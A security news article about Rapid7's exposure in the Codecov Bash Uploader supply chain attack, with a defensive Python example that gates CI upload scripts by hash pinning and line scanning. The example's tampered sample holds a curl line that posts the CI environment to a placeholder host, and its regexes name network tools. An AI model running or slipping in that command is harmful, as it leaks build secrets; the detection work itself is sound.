Rapid7, a major cybersecurity company, has announced that a small subset of its source code repositories was exposed in the course of the Codecov supply chain attack. According to the official statement, the affected repositories contained internal credentials and alert-related data for some of its Managed Detection and Response (MDR) customers.
On April 15, 2021, code coverage provider Codecov disclosed that its Bash Uploader script had been backdoored by unknown actors. The script runs inside customers' continuous integration (CI) jobs, where it can read the source tree and the environment variables of the build, which commonly hold tokens, keys, and other credentials. The malicious modification sent that environment to an attacker-controlled server, giving the adversaries a way into systems inside Codecov users' networks, including the product code those companies build and ship to others. Because the Bash Uploader legitimately sends data out of the customer's network, the exfiltration blended in with expected traffic.
The compromise began on January 31, 2021 and went unnoticed until April 1, 2021. During that window the altered script could collect authentication tokens, keys, login details, service account credentials, and other confidential information belonging to customers. As a result, hundreds of users were affected, with data in their CI environments exposed.
Rapid7 confirmed that it had fallen victim to the Codecov attack. Specifically, the malicious Bash Uploader was in use on a single CI server that the vendor uses to build and test internal tooling for its MDR customers. Although the intruders were not able to alter the product code itself, they did gain access to a small set of source code repositories containing customer credentials and other sensitive information. All affected credentials have since been rotated, and the company has contacted the affected customers to ensure they took appropriate mitigation steps.
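The attack hinged on a CI script that could read the build environment and talk to the network, so a practical pre-execution gate is to pin the uploader's hash and to refuse any copy containing a line that ships the environment off-box. The Python below is an added example written for this article, not Codecov's or Rapid7's code. Both sample scripts, the placeholder host 198.51.100.23, and the function names are constructed for illustration; the pinned hash is computed from the clean sample rather than taken from any published checksum.

```python
import hashlib
import hmac
import re

# Constructed sample of a tampered CI upload script. The injected line is
# modelled on the public description of the Codecov backdoor (a curl POST of
# the CI environment and git remote list to an attacker host); the host is a
# documentation-range placeholder, not the real one.
TAMPERED_SCRIPT = """#!/usr/bin/env bash
set -e
url="https://codecov.example/upload"
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://198.51.100.23/upload
curl -X POST --data-binary @coverage.xml "$url/v4?token=$CODECOV_TOKEN"
"""

# Constructed sample of the same script without the injected line. It still
# reads the environment (for a line count) and still uploads a file, so a
# naive "env or curl" check would produce a false positive here.
CLEAN_SCRIPT = """#!/usr/bin/env bash
set -e
url="https://codecov.example/upload"
echo "CI env has $(env | wc -l) variables"
curl -X POST --data-binary @coverage.xml "$url/v4?token=$CODECOV_TOKEN"
"""

# A network client able to send a request body.
NET_SEND = re.compile(r"\b(curl|wget)\b")
# A dump of the whole process environment, in substitution or pipe form.
ENV_DUMP = re.compile(r"(\$\(\s*(env|printenv|set)\b|`\s*(env|printenv|set)\b|\b(env|printenv)\s*\|)")
# The dumped environment piped straight into a network client.
PIPE_TO_NET = re.compile(r"\b(env|printenv)\b[^|]*\|.*\b(curl|wget|nc|ncat)\b")


def find_env_exfil(script_text: str) -> list[tuple[int, str]]:
    """Return (line_number, line) for lines that send the environment over the
    network. Both an environment dump and a network client must appear on the
    same line, so `env | grep` or a plain coverage upload is not flagged."""
    hits = []
    for n, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if NET_SEND.search(stripped) and ENV_DUMP.search(stripped):
            hits.append((n, stripped))
        elif PIPE_TO_NET.search(stripped):
            hits.append((n, stripped))
    return hits


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def verify_pinned(script_text: str, expected_sha256: str) -> bool:
    """True only if the fetched script matches the hash pinned in the repo.
    Constant-time compare so the check itself is not a timing oracle."""
    return hmac.compare_digest(sha256_hex(script_text), expected_sha256.lower())


def audit_uploader(script_text: str, expected_sha256: str) -> tuple[bool, list[str]]:
    """Gate a CI upload script before it runs: the pinned hash must match and
    no line may ship the environment off-box. Returns (safe_to_run, findings)."""
    findings = []
    if not verify_pinned(script_text, expected_sha256):
        findings.append("sha256 mismatch against pinned value")
    for n, line in find_env_exfil(script_text):
        findings.append(f"line {n}: environment sent over network: {line}")
    return (not findings, findings)


if __name__ == "__main__":
    # In a real pipeline the pinned hash is committed next to the CI config and
    # refreshed only through a reviewed change, never recomputed at build time.
    pinned = sha256_hex(CLEAN_SCRIPT)
    for name, script in (("clean", CLEAN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        ok, findings = audit_uploader(script, pinned)
        print(f"{name}: {'OK' if ok else 'BLOCKED'}")
        for finding in findings:
            print("  ", finding)
```

The hash pin is the control that would have stopped this incident outright, since any silent edit to a fetched script changes its digest; the line scan is a second, independent signal that still fires when the pin has been updated carelessly or the script is vendored without review. Note that the pattern match is deliberately narrow and will miss an exfiltration split across several lines or hidden behind a variable, which is why it complements the pin rather than replacing it.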
To check whether your organization was affected by the Rapid7 breach and to prevent further compromise, you can download the community Sigma rule already available in Threat Detection Marketplace.
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, LogPoint, Humio, RSA NetWitness, FireEye
Tactics: Initial Access
Techniques: Supply Chain Compromise (T1195)
Get a subscription to Threat Detection Marketplace, a world-leading Content-as-a-Service (CaaS) platform that provides qualified, cross-vendor, and cross-tool SOC content tailored to 23 market-leading SIEM, EDR, and NTDR technologies. Our content is continuously enriched with additional threat context, verified, and checked for impact, efficiency, false positives, and other operational considerations through a series of quality assurance audits. Want to craft your own detection content? Join our Threat Bounty Program!